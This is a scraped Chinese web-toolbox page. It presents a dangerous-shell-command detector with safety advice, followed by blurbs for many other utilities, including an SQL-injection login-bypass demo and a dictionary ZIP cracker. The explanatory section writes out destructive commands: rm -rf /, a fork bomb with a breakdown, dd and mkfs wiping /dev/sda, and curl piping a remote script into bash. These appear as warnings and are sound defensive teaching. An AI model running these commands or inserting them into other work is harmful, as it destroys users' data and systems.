HTML净化器 - 清除危险标签与属性
粘贴HTML,过滤掉script、onerror等危险内容,保留安全片段。
UD5工具箱
检测危险命令 · 识别潜在风险 · 提供安全建议 · 保护您的系统
rm -rf / — 递归强制删除根目录下所有文件,会导致系统彻底崩溃,无法恢复。:(){ :|:& };: — 通过无限递归创建进程,瞬间耗尽系统资源,导致拒绝服务。dd if=/dev/zero of=/dev/sda — 将磁盘全部覆写为零,数据永久丢失。mkfs.ext4 /dev/sda — 格式化磁盘,清除所有数据。curl http://恶意网址 | bash — 直接执行未经验证的远程脚本,可能植入后门或恶意软件。curl -s URL | bash 这种模式被称为"盲执行",危险性在于:curl -s URL -o script.sh 下载,审查代码,确认安全后再 bash script.sh 执行。
chmod 777 将文件或目录设置为所有人可读、可写、可执行,风险包括:755(目录/可执行文件)或 644(普通文件),仅在绝对必要时才使用更宽松的权限。
:(){ :|:& };:,解释::() — 定义一个名为 : 的函数{ :|:& } — 函数体递归调用自身,并通过管道 fork 出两个子进程; — 函数定义结束: — 调用该函数,触发炸弹ulimit -u 限制用户最大进程数/etc/security/limits.conf 中配置进程限制rm 命令的最佳实践:-i 交互模式:rm -i 会在删除前逐一确认。ls 后 rm:先用 ls 确认要删除的文件列表,再执行删除。-f:-f 会强制删除且不提示,极其危险。trash-cli,使用 trash-put 代替 rm,文件可恢复。sudo 时需注意:sudo su 长期保持 root 状态。sudo rm -rf /var/log/* 中的通配符可能意外匹配到关键文件。/usr/bin/rm 而非 rm。visudo 编辑,限制可执行的命令范围。/var/log/auth.log,定期审查。
eval 会将参数作为 Shell 命令执行,风险包括:dd 是强大的磁盘操作工具,俗称"数据销毁器":of=/dev/sda 直接写入磁盘,会覆盖分区表和所有数据。lsblk 确认磁盘设备名称,mount 确认挂载状态。status=progress 参数观察写入进度。balenaEtcher 等图形工具,降低误操作风险。
粘贴HTML,过滤掉script、onerror等危险内容,保留安全片段。
展示多个通过WCAG AA/AAA级对比度验证的预置配色方案,用于文字和背景。
尝试用常见密码字典测试加密ZIP文件,限于教学演示,不保证破解强度。
输入一个密码哈希字符串,识别其算法(bcrypt、argon2、SHA-256 等)并验证格式。
按下键盘任意键,实时显示对应JavaScript键盘事件的key、keyCode、code等信息,方便开发调试。
使用SHA-1+k-Anonymity技术安全地核对密码是否曾在已知泄露数据库中,无需上传原文。
生成带有密钥的链接或文本,一旦被查看即永久删除(基于localStorage模拟)。
扫描粘贴的代码,高亮并列出所有 TODO、FIXME、HACK 等标记注释,帮助跟踪开发任务。
编写 OpenAPI 3.x YAML 定义,实时校验结构是否正确,高亮错误位置,辅助 API 设计。
上传 PNG 文件,列出所有数据块(IHDR、IDAT、tEXt 等),提取隐藏的文本或时间信息。
生成一个随机字符矩阵的密码卡,通过行列坐标记忆组合强密码,可打印保存。
输入鱼缸净水量和药物推荐浓度,计算需要加入的毫升或克数,避免用药过量。
输入包含隐私信息的文本,一键将手机号、身份证等部分遮盖。
显示人体正面与背面脆弱点,点击显示简单有效的击打与解脱方法。
选择春夏秋冬与<5/10/20km,自动生成必须携带物品列表,进阶版含急救包。
展示常见野生菌外观特征对比,标注可食与剧毒区别,附中毒症状。
输入药片上的字母数字、颜色及形状,从常用药品库中匹配可能品种,辅助用药安全。
生成一次性恢复码,排列成卡片样式可打印保存,用于账号恢复。
生成由随机单词组成的口令短语,或自定义字符集强密码,实时显示强度。
标准急救包推荐清单,勾选已有并标记过期日期,提醒更换,居家安全必备。
对简单混淆的JS进行格式化,并尝试将短变量名替换为更具描述性的名称,提高可读性。
模拟服务端生成与校验CSRF令牌的完整过程,展示隐藏在表单与Session中的同步模式。
同步器令牌模式演示:生成令牌嵌入表单,提交时验证,理解CSRF防护核心流程。
配置iframe的sandbox属性,加载测试页面,直观查看表单提交、脚本执行等功能的限制效果。
基于Web Crypto API模拟的3DES在线加解密,兼容旧版系统升级安全策略,支持多种填充方式。
预览常见的 native font stacks(如苹果、Windows系统字体)的实际显示效果。
输入URL,检测CSP、X-Frame、HSTS、Referrer-Policy等头部,并给出安全等级。
提供代码评审和文档评审的通用检查项,标出等级并生成评审报告。
构建一个虚拟的登录窗,演示SQL注入登录绕过,并展示参数化查询如何防范。
使用CTAP2模拟器或安全密钥在浏览器中体验无密码注册与认证流程。